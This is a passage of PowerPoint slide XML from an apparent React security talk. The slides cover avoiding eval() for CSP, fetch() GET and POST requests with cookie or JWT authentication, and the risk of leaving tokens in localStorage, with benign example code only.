              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>() =&gt; use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>JSON.parse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> prohibits setting a strong Content Security Policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2614863" y="4775337"/>
            <a:ext cx="6492226" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>https://stackoverflow.com/questions/33225951/evaling-code-with-jsx-syntax-in-it</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="389031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Communicating with Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1382379"/>
            <a:ext cx="5790948" cy="469690"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Getting public data – use fetch()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1732546" y="1884153"/>
            <a:ext cx="6603991" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fetch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>then</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response </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=&gt;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response</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json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>())</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1732545" y="3375980"/>
            <a:ext cx="6603991" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fetch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>url</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body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JSON</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stringify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data</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headers</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'Content-Type'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'application/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>json</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method</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'POST'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mode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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cors</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r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>then</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response </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=&gt;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response</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json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>())</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609599" y="1818171"/>
            <a:ext cx="843602" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>GET</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609594" y="3271084"/>
            <a:ext cx="813043" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609594" y="2302477"/>
            <a:ext cx="11004887" cy="1041419"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:normAutofit lnSpcReduction="10000"/>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Modifying server state:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By default fetch() uses the GET &gt; exposes data to the proxies and logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set the 'method' attribute to POST in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> object</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609594" y="5796598"/>
            <a:ext cx="11004887" cy="444112"/>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Alternatives to fetch() – wrappers around </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>axios</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="160551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Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1414463"/>
            <a:ext cx="5406189" cy="5008108"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Authenticated requests:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Cookies - set 'credentials' to 'same-site' unless using CORS </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>JWT tokens – add 'Authorization' header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Security considerations:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Make sure the fetched URL cannot be modified by an attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400548" y="1211574"/>
            <a:ext cx="5160081" cy="2554545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fetch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>url</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body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JSON</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stringify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data</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'same-origin'</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headers</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'Content-Type'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'application/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>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method</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'POST'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mode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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cors</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r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>then</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response </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=&gt;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response</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json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>())</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400548" y="3918517"/>
            <a:ext cx="5160080" cy="2554545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fetch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>url</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body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JSON</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stringify</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data</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headers</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'Content-Type'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'application/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>json</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b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'Authorization'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> `Bearer $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>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method</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'POST'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mode</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i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cors</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 </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br>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>response </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=&gt;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response</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json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>())</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="60402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Leaking Sensitive Data into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>localStorage</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1414463"/>
            <a:ext cx="10972800" cy="3044916"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>React doesn’t provide a wrapper around </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>localStorage</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other libraries do: store.js, cross-storage, redux-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>localstorage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Problem: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>applications store JWTs, OAuth tokens, API keys in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>localStorage</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>sensitive data is not cleared on logout</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example scenario:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="635508" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JWT stored in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>localStorage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to be accessed across tabs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="635508" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JWT has a long expiration period since it’s used as a session id</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="635508" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User clicks on a phishing link -&gt; XSS is executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
